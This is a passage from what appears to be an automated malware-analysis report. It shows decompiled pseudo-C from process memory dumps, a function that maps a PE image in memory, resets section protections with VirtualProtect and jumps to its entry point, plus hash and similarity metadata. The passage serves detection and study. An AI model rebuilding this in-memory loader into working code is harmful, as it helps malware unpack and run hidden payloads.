                                                                                                        						_v184 =  *((intOrPtr*)(_t221 + 8));
                                                                                                        						_v180 =  *((intOrPtr*)(0x5b4418 + (_v160 << 4) + (_v164 << 3) + ((_t199 >> 0x0000001d & 0x00000001) << 2)));
                                                                                                        						_v176 =  &_v44;
                                                                                                        						_v168 = _t221;
                                                                                                        						_t182 = VirtualProtect(??, ??, ??, ??); // executed
                                                                                                        						_t272 = _t272 - 0x10;
                                                                                                        						_t223 = _v156 + 1;
                                                                                                        						_v172 = _t182;
                                                                                                        						_v148 = _v168 + 0x28;
                                                                                                        						_v152 = _t223;
                                                                                                        						if(_t223 == _v60) {
                                                                                                        							goto L5;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				L5:
                                                                                                        				 *_t272 = _v68;
                                                                                                        				_v116 = _v68 +  *((intOrPtr*)(_v48 + 0x14));
                                                                                                        				_t155 = DisableThreadLibraryCalls(??);
                                                                                                        				_t273 = _t272 - 4;
                                                                                                        				_t234 =  *_v100;
                                                                                                        				_v140 = _t155;
                                                                                                        				_v136 = _t234;
                                                                                                        				_v112 = _v68;
                                                                                                        				if(_t234 == 0) {
                                                                                                        					L2:
                                                                                                        					_t245 = _v48;
                                                                                                        					_v40 =  *((intOrPtr*)(_t245 + 0x34));
                                                                                                        					_v36 =  *((intOrPtr*)(_t245 + 8));
                                                                                                        					_v32 =  *((intOrPtr*)(_t245 + 0x30));
                                                                                                        					_v28 =  *((intOrPtr*)(_t245 + 0x28));
                                                                                                        					_v24 =  *((intOrPtr*)(_t245 + 0x50));
                                                                                                        					_v20 = _v116;
                                                                                                        					 *_t273 = _t245;
                                                                                                        					_v188 = 0;
                                                                                                        					_v184 = 0x74;
                                                                                                        					_v120 =  &_v40;
                                                                                                        					_v124 = 0;
                                                                                                        					_v128 = 0x74;
                                                                                                        					_v132 =  *((intOrPtr*)(_v112 + 0x28));
                                                                                                        					E005B2798();
                                                                                                        					if(_v132 != 0) {
                                                                                                        						_t272 =  *((intOrPtr*)( &_v40 + 0x10));
                                                                                                        						goto __eax;
                                                                                                        					}
                                                                                                        					return 1;
                                                                                                        				} else {
                                                                                                        					_v112 = _v68 + (_v136 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                        					goto L2;
                                                                                                        				}
                                                                                                        			}
































































                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.766843754.00000000005B0000.00000040.00000010.sdmp, Offset: 005B0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID: t
                                                                                                        • API String ID: 544645111-2238339752
                                                                                                        • Opcode ID: fcc0be0ba3e304c4d561b24e325a534f1be55a22126531c9f54c97b5cead03c0
                                                                                                        • Instruction ID: bd2f4591c9279cb418aa95b67b5c9c0cc5c4dd682fa12506688a3c8489c4d7df
                                                                                                        • Opcode Fuzzy Hash: fcc0be0ba3e304c4d561b24e325a534f1be55a22126531c9f54c97b5cead03c0
                                                                                                        • Instruction Fuzzy Hash: 0DB1BCB4D006188FCB54CF68C980A9DFBF0FF88314F6585AAE949AB351D730A985CF95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.766843754.00000000005B0000.00000040.00000010.sdmp, Offset: 005B0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
                                                                                                        • Instruction ID: 0f80f0551868be49f17de5ebe6af4e6b512bb5176edfe887eff4b8bdb385cf9a
                                                                                                        • Opcode Fuzzy Hash: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
                                                                                                        • Instruction Fuzzy Hash: 8F4104B5E0561A9FDB48CF98D494AAEBBF0FF88310F15852DE849AB340D375A840CF94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Executed Functions

                                                                                                        C-Code - Quality: 42%
                                                                                                        			E032811ED(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
                                                                                                        				intOrPtr _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				char _v40;
                                                                                                        				char _v44;
                                                                                                        				intOrPtr* _v48;
                                                                                                        				intOrPtr _v52;
                                                                                                        				intOrPtr _v56;
                                                                                                        				intOrPtr _v60;
                                                                                                        				intOrPtr _v64;
                                                                                                        				void* _v68;
                                                                                                        				char* _v72;
                                                                                                        				int _v76;
                                                                                                        				long _v80;
                                                                                                        				long _v84;
                                                                                                        				DWORD* _v88;
                                                                                                        				intOrPtr _v92;
                                                                                                        				int _v96;
                                                                                                        				intOrPtr* _v100;
                                                                                                        				intOrPtr _v104;
                                                                                                        				intOrPtr _v108;
                                                                                                        				void* _v112;
                                                                                                        				intOrPtr _v116;
                                                                                                        				char* _v120;
                                                                                                        				intOrPtr _v124;
                                                                                                        				intOrPtr _v128;
                                                                                                        				intOrPtr _v132;
                                                                                                        				intOrPtr _v136;
                                                                                                        				intOrPtr _v140;
                                                                                                        				intOrPtr _v144;
                                                                                                        				intOrPtr _v148;
                                                                                                        				intOrPtr _v152;
                                                                                                        				intOrPtr _v156;
                                                                                                        				signed int _v160;
                                                                                                        				signed int _v164;
                                                                                                        				intOrPtr _v168;
                                                                                                        				int _v172;
                                                                                                        				char* _v176;
                                                                                                        				intOrPtr _v180;
                                                                                                        				intOrPtr _v184;
                                                                                                        				char _v188;
                                                                                                        				intOrPtr* _t137;
                                                                                                        				int _t143;
                                                                                                        				int _t151;
                                                                                                        				int _t155;
                                                                                                        				int _t182;
                                                                                                        				unsigned int _t199;
                                                                                                        				intOrPtr _t221;
                                                                                                        				intOrPtr _t223;
                                                                                                        				void* _t231;
                                                                                                        				intOrPtr _t234;
                                                                                                        				void* _t241;
                                                                                                        				intOrPtr _t245;
                                                                                                        				intOrPtr _t252;
                                                                                                        				DWORD* _t265;
                                                                                                        				void* _t269;
                                                                                                        				intOrPtr* _t272;
                                                                                                        				intOrPtr* _t273;
                                                                                                        
                                                                                                        				_t137 = _a4;
                                                                                                        				_v44 = 0;
                                                                                                        				_t241 =  *((intOrPtr*)(_t137 + 0x38));
                                                                                                        				 *0x3284418 = 1;
                                                                                                        				asm("movaps xmm0, [0x3283010]");
                                                                                                        				asm("movups [0x3284428], xmm0");
                                                                                                        				_v48 = _t137;
                                                                                                        				_v52 =  *((intOrPtr*)(_t137 + 0x20));
                                                                                                        				_v56 =  *((intOrPtr*)(_v48 + 0x1c));
                                                                                                        				_v188 = _t241;
                                                                                                        				_v184 =  *((intOrPtr*)(_t137 + 0x18));
                                                                                                        				_v180 = 4;
                                                                                                        				_v176 =  &_v44;
                                                                                                        				_v60 =  *((intOrPtr*)(_v48 + 0xc));
                                                                                                        				_v64 = 4;
                                                                                                        				_v68 = _t241;
                                                                                                        				_v72 =  &_v44;
                                                                                                        				_t143 = VirtualProtect(__edi, __ebx, __esi, _t265); // executed
                                                                                                        				_v76 = _t143;
                                                                                                        				_v188 = _v68;
                                                                                                        				_v184 = 0;
                                                                                                        				_v180 =  *((intOrPtr*)(_v48 + 0x18));
                                                                                                        				_v80 = 0x400;
                                                                                                        				_v84 = 2;
                                                                                                        				_v88 =  &_v44;
                                                                                                        				_v92 = 0;
                                                                                                        				E03282798();
                                                                                                        				E032817A5(_v68,  *_v48, _v52);
                                                                                                        				E03282798( *_v48, 0, _v52);
                                                                                                        				_t151 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
                                                                                                        				_t272 = _t269 - 0x8c;
                                                                                                        				_t231 = _v68;
                                                                                                        				_t252 =  *((intOrPtr*)(_t231 + 0x3c));
                                                                                                        				_v96 = _t151;
                                                                                                        				_v100 = _v68 + 0x3c;
                                                                                                        				_v104 = _t231;
                                                                                                        				_v108 = _t252;
                                                                                                        				if(_t252 != 0) {
                                                                                                        					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                        				}
                                                                                                        				_v144 = _v104;
                                                                                                        				if(_v60 != 0) {
                                                                                                        					_v148 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
                                                                                                        					_v152 = 0;
                                                                                                        					while(1) {
                                                                                                        						_t221 = _v148;
                                                                                                        						_t199 =  *(_t221 + 0x24);
                                                                                                        						_v156 = _v152;
                                                                                                        						_v160 = _t199 >> 0x0000001e & 0x00000001;
                                                                                                        						_v164 = _t199 >> 0x1f;
                                                                                                        						_v188 = _v68 +  *((intOrPtr*)(_t221 + 0xc));
                                                                                                        						_v184 =  *((intOrPtr*)(_t221 + 8));
                                                                                                        						_v180 =  *((intOrPtr*)(0x3284418 + (_v160 << 4) + (_v164 << 3) + ((_t199 >> 0x0000001d & 0x00000001) << 2)));
                                                                                                        						_v176 =  &_v44;
                                                                                                        						_v168 = _t221;
                                                                                                        						_t182 = VirtualProtect(??, ??, ??, ??); // executed
                                                                                                        						_t272 = _t272 - 0x10;
                                                                                                        						_t223 = _v156 + 1;
                                                                                                        						_v172 = _t182;
                                                                                                        						_v148 = _v168 + 0x28;
                                                                                                        						_v152 = _t223;
                                                                                                        						if(_t223 == _v60) {
                                                                                                        							goto L5;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				L5:
                                                                                                        				 *_t272 = _v68;
                                                                                                        				_v116 = _v68 +  *((intOrPtr*)(_v48 + 0x14));
                                                                                                        				_t155 = DisableThreadLibraryCalls(??);
                                                                                                        				_t273 = _t272 - 4;
                                                                                                        				_t234 =  *_v100;
                                                                                                        				_v140 = _t155;
                                                                                                        				_v136 = _t234;
                                                                                                        				_v112 = _v68;
                                                                                                        				if(_t234 == 0) {
                                                                                                        					L2:
                                                                                                        					_t245 = _v48;
                                                                                                        					_v40 =  *((intOrPtr*)(_t245 + 0x34));
                                                                                                        					_v36 =  *((intOrPtr*)(_t245 + 8));
                                                                                                        					_v32 =  *((intOrPtr*)(_t245 + 0x30));
                                                                                                        					_v28 =  *((intOrPtr*)(_t245 + 0x28));
                                                                                                        					_v24 =  *((intOrPtr*)(_t245 + 0x50));
                                                                                                        					_v20 = _v116;
                                                                                                        					 *_t273 = _t245;
                                                                                                        					_v188 = 0;
                                                                                                        					_v184 = 0x74;
                                                                                                        					_v120 =  &_v40;
                                                                                                        					_v124 = 0;
                                                                                                        					_v128 = 0x74;
                                                                                                        					_v132 =  *((intOrPtr*)(_v112 + 0x28));
                                                                                                        					E03282798();
                                                                                                        					if(_v132 != 0) {
                                                                                                        						_t272 =  *((intOrPtr*)( &_v40 + 0x10));
                                                                                                        						goto __eax;
                                                                                                        					}
                                                                                                        					return 1;
                                                                                                        				} else {
                                                                                                        					_v112 = _v68 + (_v136 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                        					goto L2;
                                                                                                        				}
                                                                                                        			}
































































                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.830104608.0000000003280000.00000040.00000010.sdmp, Offset: 03280000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID: t
                                                                                                        • API String ID: 544645111-2238339752
                                                                                                        • Opcode ID: 48f53fb3378a577c5bf3fab0995a63ba5b2becd6ac647210b5b50ca1fdddc41b
                                                                                                        • Instruction ID: ce976a3004ee8214a1c0d846a55523c4eae9d222897a7905bd5cd9aa55245eab
                                                                                                        • Opcode Fuzzy Hash: 48f53fb3378a577c5bf3fab0995a63ba5b2becd6ac647210b5b50ca1fdddc41b
                                                                                                        • Instruction Fuzzy Hash: DDB1BCB4D113198FDB14DF59C880A9DFBF0BF88304F1585AAD948AB391D334A992CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.830104608.0000000003280000.00000040.00000010.sdmp, Offset: 03280000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
                                                                                                        • Instruction ID: fb9da9a40dbd5645e2f584fb4ddb46e10bebf19ab08149c4417b1454c5ae699a
                                                                                                        • Opcode Fuzzy Hash: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
                                                                                                        • Instruction Fuzzy Hash: 9541F5B5E1521A9FDB04DF98D490AAEBBF0FF48314F15852DE449AB380D375A881CB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions